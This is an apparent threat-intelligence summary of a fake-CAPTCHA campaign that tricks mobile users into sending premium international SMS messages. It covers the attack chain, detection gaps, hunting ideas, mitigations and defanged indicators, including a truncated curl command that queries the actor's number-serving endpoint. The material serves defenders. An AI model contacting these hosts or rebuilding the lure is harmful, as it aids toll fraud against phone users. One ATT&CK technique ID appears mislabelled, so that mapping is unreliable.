Hold the Phone! International Revenue Share Fraud Driven by Fake CAPTCHAs

Key Takeaways

• Fake CAPTCHAs are being weaponized to trick mobile users into sending premium international SMS messages.
• The campaign leverages Traffic Distribution Systems (TDS) to route victims to fraudulent landing pages.
• A single interaction can generate up to 60 SMS messages to over 50 international destinations, causing significant financial loss.
• Attackers use back button hijacking via JavaScript to trap users on the malicious pages.
• The operation exploits the Click2SMS affiliate marketing model and targets both individuals and telecom carriers.

Affected Systems

• iOS
• Android
• Mobile Devices

Attack Chain

Victims are redirected via a Traffic Distribution System (TDS) to a fake CAPTCHA page after visiting a typosquatted domain. The malicious page uses social engineering to prompt the user to 'verify they are human' by clicking a button, which triggers the device's SMS application. The app is pre-filled with a message and multiple premium international phone numbers. If the user sends the message, they incur high termination fees, a portion of which is shared with the threat actor.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No

The article does not provide specific detection rules, but shares IOCs and behavioral patterns for hunting.

Detection Engineering Assessment

EDR Visibility: Low — The attack primarily occurs within mobile web browsers and native SMS applications, where standard enterprise EDR solutions have limited visibility. Network Visibility: Medium — DNS requests to known TDS and fake CAPTCHA domains can be monitored on corporate networks, but the actual SMS transmission occurs over cellular networks. Detection Difficulty: Hard — The attack relies on user interaction on mobile devices, often outside corporate network perimeters, and blends with legitimate SMS traffic.

Required Log Sources

• DNS Logs
• Web Proxy Logs
• Mobile Device Management (MDM) Logs

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Search web proxy and DNS logs for connections to known TDS domains or domains hosted on AS15699 associated with this campaign.	DNS Logs, Web Proxy Logs	Delivery	Low
Monitor for unusual spikes in international SMS messaging from corporate-managed mobile devices, particularly to high-risk country codes like +994, +31, or +20.	MDM Logs, Carrier Billing Reports	Execution	Medium

Control Gaps

• Mobile endpoint visibility
• SMS content inspection
• Carrier-level fraud filtering

Key Behavioral Indicators

• Browser history manipulation (pushState loops)
• Redirection chains involving multiple affiliate tracking parameters (e.g., utm_campaign, productId)

False Positive Assessment

• Low

Recommendations

Immediate Mitigation

• Block known IOC domains and IPs at the corporate firewall and DNS resolvers.

Infrastructure Hardening

• Implement strict mobile device policies restricting international SMS capabilities for corporate devices if not required for business operations.

User Protection

• Deploy Mobile Threat Defense (MTD) solutions to block access to known malicious URLs and TDS networks.

Security Awareness

• Educate users to never send SMS messages to verify their identity on CAPTCHA pages.
• Train employees to recognize back-button hijacking and to close the browser tab instead of repeatedly attempting to go back.

MITRE ATT&CK Mapping

• T1204.001 - User Execution: Malicious Link
• T1566 - Phishing
• T1620 - Premium SMS Toll Fraud

Additional IOCs

• Domains:
  • d[[.]]fufecarrol[[.]]top - SMS actor-controlled domain hosting fake CAPTCHA pages.
  • d[[.]]herbosfinx[[.]]com - SMS actor-controlled domain hosting fake CAPTCHA pages.
  • d[[.]]marraheltin[[.]]com - SMS actor-controlled domain hosting fake CAPTCHA pages.
  • d[[.]]panzozerrot[[.]]com - SMS actor-controlled domain hosting fake CAPTCHA pages.
  • d[[.]]remotesbuffalo[[.]]top - SMS actor-controlled domain hosting fake CAPTCHA pages.
  • d[[.]]santafebuno[[.]]top - SMS actor-controlled domain hosting fake CAPTCHA pages.
  • d[[.]]vistertransit[[.]]com - SMS actor-controlled domain hosting fake CAPTCHA pages.
  • d[[.]]zerrotmamil[[.]]com - SMS actor-controlled domain hosting fake CAPTCHA pages.
  • r[[.]]buffalosolpe[[.]]top - SMS actor-controlled domain hosting fake CAPTCHA pages.
  • r[[.]]carrolvassin[[.]]top - SMS actor-controlled domain hosting fake CAPTCHA pages.
  • r[[.]]transitcaxip[[.]]com - SMS actor-controlled domain hosting fake CAPTCHA pages.
  • claimandwins[[.]]com - Domain hosting older versions of the fake CAPTCHA/download pages.
  • 4lifetips[[.]]com - Domain hosting older versions of the fake CAPTCHA/download pages.
  • verifysuper[[.]]com - externOffer domain hosting fake CAPTCHA pages.
  • chat[[.]]matchnewtoday[[.]]com - SMS actor-controlled domain hosting fake chat content.
  • vids[[.]]chatorizon[[.]]com - SMS actor-controlled domain hosting fake video content.
• Urls:
  • hxxps://d[[.]]ruelomamuy[[.]]com/makeTrackerDownload[.]php?a=WEBSMS&s=5002320649344849&c=US&groupds=138&caf=5002320649344849&origSms=I%20want%20to%20continue%205002320649344849&step=9 - API endpoint called by JavaScript to retrieve phone numbers and SMS messages.
  • hxxps://verifysuper[[.]]com/cl/i/wopmej?aff_sub4=5002320649344849&aff_sub5=US - externOffer URL used to redirect non-targeted users to alternate fake CAPTCHA pages.
• Command Lines:
  • Purpose: Query server to retrieve phone numbers for the SMS scam | Tools: curl, jq | Stage: Execution | curl -s 'https://d[.]ruelomamuy[.]com/makeTrackerDownload.php?a=WEBSMS
• Other:
  • AS15699 - Adam EcoTech ASN used to host the fake CAPTCHA pages and related infrastructure.